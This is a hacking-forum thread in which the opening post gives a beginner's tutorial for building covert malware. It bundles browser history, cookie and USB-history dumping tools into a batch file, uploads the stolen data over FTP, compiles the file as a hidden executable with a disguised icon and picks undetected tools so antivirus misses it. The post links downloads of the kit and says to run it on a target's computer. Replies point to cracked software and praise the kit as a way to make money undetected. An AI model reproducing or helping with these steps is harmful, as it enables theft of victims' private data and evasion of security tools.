Sinisterly
[FOR BEGINNERS] Create malware with just a few lines of code... - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: [FOR BEGINNERS] Create malware with just a few lines of code... (/Thread-FOR-BEGINNERS-Create-malware-with-just-a-few-lines-of-code)



[FOR BEGINNERS] Create malware with just a few lines of code... - hacxx - 01-16-2022

This tutorial explain in detail how to edit Undeniable Source Agent. The user will need to buy a copy of Quick Batch File Compiler or search online for a rare release of Quick Batch File Compiler to avoid detections.

How to?
1 - Start by opening file.bat with Quick Batch File Compiler
[Image: 2.jpg]

2 - Change username and password after ftp line
First line username, Second line password

Or use the default.
The files uploaded cannot be deleted, only if no download happen in 30 days it is removed.

3 - Go to Embedded Files and add your app icon (https://iconarchive.com/ - Professional icons)
4 - Untick Add Administrator manifest.

5 - Add ChromeHistoryView.exe, EdgeCookiesView.exe, MyLastSearch.exe, USBDeview.exe and main.bat to the vault.
(https://www.nirsoft.net/ for useful executables)

NOTE: The coder can add as many executables as he or she wants. The only problem is that the executables must be not detected.

[Image: 1.jpg]

NOTE: The batch (file.bat) is setup to run locally showing a console to the user.
Let's change that and conclude the tutorial...

6 - Go to source and add to all exes %MYFILES%\

Example: ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html
To: %MYFILES%\ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html

[Image: 3.jpg]

7 - On Quick Batch File Compiler go to Project > Options

8 - Tick the box Ghost Application, Untick Show splash on startup and ok.

9 - Go to Project > Compile and save the exe.

10 - Go to your target computer and execute the exe or find your way in to drop the executable.
------------------------------------------------------------------------------------------------
I'm releasing version 2 which fixes a bug i didn't had fixed in version 1.

Download:
https://filecrypt.cc/Container/DD10E0EE57.html
http://gigapeta.com/dl/10067377a5aa41c
https://oxy.cloud/d/HHQe
https://ddownload.com/px9u2texbl8o/Undeniable_Source_Agent_2.rar

Virustotal:
Not detected in original form, must be compiled to check results.
-------------------------------------------------------------------------------------------------


RE: [FOR BEGINNERS] Create malware with just a few lines of code... - mothered - 01-17-2022

Quote:The user will need to buy a copy of Quick Batch File Compiler or search online for a rare release of Quick Batch File Compiler
If you Google "Quick Batch File Compiler cracked", there are quite a few sources available.

But be sure to execute the tool In a controlled environment.


RE: [FOR BEGINNERS] Create malware with just a few lines of code... - ConcernedCitizen - 01-17-2022

Nice way to make money, as long as you stay undetected and nobody uploads your files to VT as samples.
Good work.


RE: [FOR BEGINNERS] Create malware with just a few lines of code... - mothered - 01-17-2022

(01-17-2022, 02:36 PM)vittring Wrote: and nobody uploads your files to VT as samples.
Unfortunately, It's Inevitable.


RE: [FOR BEGINNERS] Create malware with just a few lines of code... - hacxx - 01-17-2022

(01-17-2022, 03:01 AM)mothered Wrote: If you Google "Quick Batch File Compiler cracked", there are quite a few sources available.

Yes it can be easily found online. A good feature of "Quick Batch File Compiler" is that it can compile using command line.
Very useful if you want to create malware generators.


RE: [FOR BEGINNERS] Create malware with just a few lines of code... - mothered - 01-18-2022

(01-17-2022, 05:02 PM)hacxx Wrote: Yes it can be easily found online. A good feature of "Quick Batch File Compiler" is that it can compile using command line.
Very useful if you want to create malware generators.
I've used this tool a while back, but I'm not sure whether I still have It on my external HDD.

If I do, I'll upload It here.